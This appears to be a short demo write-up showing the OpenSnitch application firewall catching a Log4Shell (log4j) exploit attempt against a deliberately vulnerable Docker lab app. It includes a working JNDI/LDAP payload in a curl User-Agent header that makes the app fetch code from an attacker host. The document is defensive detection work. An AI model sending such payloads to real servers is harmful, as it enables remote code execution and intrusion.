Detecting and stopping log4j vulnerability with opensnitch

[gustavo-iniguez-goya]

On the server (left):

• https://github.com/leonjza/log4jpwn running on a docker on port 8181.
• opensnitchd running, sending logs to a GUI running on another computer: "Address": "10.168.2.23:50051" (read more).
• iptables rule added to intercept FORWARDed connections: iptables -t mangle -I FORWARD -m conntrack --ctstate NEW,RELATED -j NFQUEUE --queue-num 0

On the desktop (right):

• GUI listening on port 50051: opensnitch-ui --socket 0.0.0.0:50051
• Launch the request to the Java application: curl -v -H 'User-Agent: ${jndi:ldap://10.168.10.164:443/a}' localhost:8181

Result:

The curl request is sent to the vulnerable java app (1), the java app executes the payload and opens a new connection to the attacker's server (2) to download the exploit (/a), and then opensnitch stops the connection and asks to allow or deny it (3).